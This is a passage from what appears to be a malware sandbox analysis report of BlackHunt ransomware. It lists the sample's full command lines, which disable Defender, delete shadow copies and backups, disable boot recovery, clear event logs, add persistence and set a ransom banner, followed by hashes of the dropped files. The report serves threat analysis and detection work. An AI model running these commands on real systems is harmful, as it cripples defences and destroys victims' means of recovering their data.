                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                              2⤵
                                                                PID:2100
                                                              • C:\Windows\System32\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                2⤵
                                                                  PID:1364
                                                                • C:\Windows\System32\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                  2⤵
                                                                    PID:4260
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                                    2⤵
                                                                      PID:2256
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                                      2⤵
                                                                        PID:228
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f
                                                                        2⤵
                                                                          PID:3508
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:1080
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:5064
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4640
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:3048
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:324
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4140
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4468
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                          2⤵
                                                                          • Suspicious use of WriteProcessMemory
                                                                          PID:4448
                                                                        • C:\Windows\System32\cmd.exe
                                                                          "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security
                                                                          2⤵
                                                                            PID:16264
                                                                            • C:\Windows\system32\wevtutil.exe
                                                                              wevtutil.exe cl Security
                                                                              3⤵
                                                                              • Clears Windows event logs
                                                                              PID:8232
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false
                                                                            2⤵
                                                                              PID:15156
                                                                              • C:\Windows\system32\wevtutil.exe
                                                                                wevtutil.exe cl Security /e:false
                                                                                3⤵
                                                                                • Clears Windows event logs
                                                                                PID:8680
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:
                                                                              2⤵
                                                                                PID:6908
                                                                                • C:\Windows\system32\fsutil.exe
                                                                                  fsutil.exe usn deletejournal /D C:
                                                                                  3⤵
                                                                                  • Deletes NTFS Change Journal
                                                                                  PID:5892
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                2⤵
                                                                                  PID:5464
                                                                                  • C:\Windows\system32\notepad.exe
                                                                                    notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt
                                                                                    3⤵
                                                                                      PID:6952
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe"
                                                                                    2⤵
                                                                                      PID:6016
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta
                                                                                      2⤵
                                                                                        PID:7160
                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                          "C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                          3⤵
                                                                                            PID:12964
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 12964 -s 1464
                                                                                              4⤵
                                                                                              • Program crash
                                                                                              PID:11872
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f
                                                                                          2⤵
                                                                                            PID:880
                                                                                          • C:\Windows\System32\cmd.exe
                                                                                            "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                            2⤵
                                                                                              PID:5944
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                              2⤵
                                                                                                PID:5592
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                2⤵
                                                                                                  PID:14024
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                  2⤵
                                                                                                    PID:14476
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                    2⤵
                                                                                                      PID:10168
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                      2⤵
                                                                                                        PID:8660
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet
                                                                                                        2⤵
                                                                                                          PID:8816
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                          2⤵
                                                                                                            PID:5324
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No
                                                                                                            2⤵
                                                                                                              PID:412
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet
                                                                                                              2⤵
                                                                                                                PID:16312
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application
                                                                                                                2⤵
                                                                                                                  PID:8132
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System
                                                                                                                  2⤵
                                                                                                                    PID:14384
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup
                                                                                                                    2⤵
                                                                                                                      PID:8608
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\
                                                                                                                      2⤵
                                                                                                                        PID:9124
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\
                                                                                                                        2⤵
                                                                                                                          PID:7760
                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\
                                                                                                                          2⤵
                                                                                                                            PID:7712
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f
                                                                                                                          1⤵
                                                                                                                          • Adds Run key to start application
                                                                                                                          PID:1148
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
                                                                                                                          1⤵
                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                          PID:4820
                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f
                                                                                                                          1⤵
                                                                                                                            PID:2020
                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                            reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f
                                                                                                                            1⤵
                                                                                                                              PID:2200
                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f
                                                                                                                              1⤵
                                                                                                                                PID:2852
                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                PID:2932
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                1⤵
                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                PID:676
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f
                                                                                                                                  2⤵
                                                                                                                                    PID:4444
                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB
                                                                                                                                  1⤵
                                                                                                                                  • Enumerates connected drives
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:2000
                                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                                  bcdedit /set {default} recoveryenabled No
                                                                                                                                  1⤵
                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                  PID:8188
                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                  vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded
                                                                                                                                  1⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:7356
                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                  1⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:7344
                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                  SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\20e006585cfd7b4ae944a3d390a209a89a85f2bb035c4946aafb10ef49c351e5.exe" /F
                                                                                                                                  1⤵
                                                                                                                                  • Creates scheduled task(s)
                                                                                                                                  PID:2880
                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                  vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded
                                                                                                                                  1⤵
                                                                                                                                  • Interacts with shadow copies
                                                                                                                                  PID:1560
                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f
                                                                                                                                  1⤵
                                                                                                                                    PID:1736
                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f
                                                                                                                                    1⤵
                                                                                                                                      PID:5068
                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                      reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f
                                                                                                                                      1⤵
                                                                                                                                        PID:1724
                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                        reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f
                                                                                                                                        1⤵
                                                                                                                                          PID:2008
                                                                                                                                        • C:\Windows\system32\wbengine.exe
                                                                                                                                          "C:\Windows\system32\wbengine.exe"
                                                                                                                                          1⤵
                                                                                                                                            PID:10808
                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f
                                                                                                                                            1⤵
                                                                                                                                              PID:2380
                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f
                                                                                                                                              1⤵
                                                                                                                                                PID:2908
                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                                                                                                1⤵
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:1180
                                                                                                                                              • C:\Windows\System32\vdsldr.exe
                                                                                                                                                C:\Windows\System32\vdsldr.exe -Embedding
                                                                                                                                                1⤵
                                                                                                                                                  PID:6620
                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f
                                                                                                                                                  1⤵
                                                                                                                                                    PID:3812
                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                    reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f
                                                                                                                                                    1⤵
                                                                                                                                                      PID:3076
                                                                                                                                                    • C:\Windows\system32\reg.exe
                                                                                                                                                      reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f
                                                                                                                                                      1⤵
                                                                                                                                                        PID:1300
                                                                                                                                                      • C:\Windows\System32\vds.exe
                                                                                                                                                        C:\Windows\System32\vds.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:11340
                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                          reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f
                                                                                                                                                          1⤵
                                                                                                                                                            PID:1780
                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                            reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5076
                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                              reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2740
                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2176
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2008
                                                                                                                                                                  • C:\Windows\system32\reg.exe
                                                                                                                                                                    reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Modifies registry class
                                                                                                                                                                    PID:2320
                                                                                                                                                                  • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                    wevtutil.exe cl System
                                                                                                                                                                    1⤵
                                                                                                                                                                    • Clears Windows event logs
                                                                                                                                                                    PID:7684
                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5068
                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                      SCHTASKS.exe /Delete /TN "Windows Critical Update" /F
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:7212
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 127.0.0.1 -n 5
                                                                                                                                                                        1⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:6776
                                                                                                                                                                      • C:\Windows\system32\reg.exe
                                                                                                                                                                        REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:6716
                                                                                                                                                                        • C:\Windows\system32\reg.exe
                                                                                                                                                                          reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:6788
                                                                                                                                                                          • C:\Windows\system32\reg.exe
                                                                                                                                                                            REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5848
                                                                                                                                                                            • C:\Windows\system32\reg.exe
                                                                                                                                                                              reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:5856
                                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:6832
                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                  taskkill /IM mshta.exe /f
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                  PID:7064
                                                                                                                                                                                • C:\Windows\system32\wbadmin.exe
                                                                                                                                                                                  wbadmin.exe delete catalog -quiet
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Deletes backup catalog
                                                                                                                                                                                  PID:6428
                                                                                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                  bcdedit /set {default} bootstatuspolicy IgnoreAllFailures
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                                                                  PID:3484
                                                                                                                                                                                • C:\Windows\system32\vssadmin.exe
                                                                                                                                                                                  vssadmin.exe Delete Shadows /all /quiet
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Interacts with shadow copies
                                                                                                                                                                                  PID:8348
                                                                                                                                                                                • C:\Windows\system32\bcdedit.exe
                                                                                                                                                                                  bcdedit /set {default} recoveryenabled No
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Modifies boot configuration data using bcdedit
                                                                                                                                                                                  PID:5812
                                                                                                                                                                                • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                  wevtutil.exe cl Application
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Clears Windows event logs
                                                                                                                                                                                  PID:7552
                                                                                                                                                                                • C:\Windows\system32\wevtutil.exe
                                                                                                                                                                                  wevtutil.exe cl Setup
                                                                                                                                                                                  1⤵
                                                                                                                                                                                  • Clears Windows event logs
                                                                                                                                                                                  PID:8012
                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 12964 -ip 12964
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:7148
                                                                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                    fsutil usn deletejournal /D M:\
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:8716
                                                                                                                                                                                    • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                      fsutil usn deletejournal /D C:\
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:14456
                                                                                                                                                                                      • C:\Windows\system32\fsutil.exe
                                                                                                                                                                                        fsutil usn deletejournal /D F:\
                                                                                                                                                                                        1⤵
                                                                                                                                                                                          PID:13760
                                                                                                                                                                                        • C:\Windows\system32\BackgroundTransferHost.exe
                                                                                                                                                                                          "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                                                                                                                                          1⤵
                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                          PID:1560

                                                                                                                                                                                        Network

                                                                                                                                                                                        MITRE ATT&CK Enterprise v15

                                                                                                                                                                                        Replay Monitor

                                                                                                                                                                                        Loading Replay Monitor...

                                                                                                                                                                                        Downloads

                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_Private.key

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          1KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          c380223f44d3d34e3c2d5cff5d3b418c

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          8b3688e2f0bc729253833dedb059e42c489b40a3

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          a87090135a29ff5c1fbcea83076d080b1af01eb21758722b2a40e4b71fbbeba9

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          2c263f098aaa64a3f4748107509c698d306fb9269f7e48410eebe00efa573acded63626265a888aadba7cbd43a3ecc03f3d02f6ad510dbe606748f6109f8fa10

                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_ReadMe.hta

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          12KB

                                                                                                                                                                                          MD5

                                                                                                                                                                                          d95ecd9ad362489023fa8380374b5173

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          9e1b64c9c603b77ec0227f109fd4d73deba6546d

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          23aa4598ab72998910e4626cbe079f63818451d18ab645cef5902bde1c5e034e

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          0da14b4650e0c7d5aa3a46d6ec9c5197871f23a867ad2fd31310616429bc0774cf6edcff8f44305be14672d159d4a2220c2d3e22be8a2d420034a1221889d2d0

                                                                                                                                                                                        • C:\ProgramData\#BlackHunt_ReadMe.txt

                                                                                                                                                                                          Filesize

                                                                                                                                                                                          684B

                                                                                                                                                                                          MD5

                                                                                                                                                                                          653fa97ad94ebd9f03d4775e2018fd74

                                                                                                                                                                                          SHA1

                                                                                                                                                                                          ed73acbaed925e43105921f230f9871635bde77f

                                                                                                                                                                                          SHA256

                                                                                                                                                                                          b35ae834e74b1fe050864d470c085649e8039fb6443edd1f388a498ed24e5cc9

                                                                                                                                                                                          SHA512

                                                                                                                                                                                          99086c8dfa5dadbfa9f6851a5a3146966db188517a8faf277b6454b9e0c1d323273139af69632ba6fdc31331c1b183f7733311a3595121107e0a1b0df618d864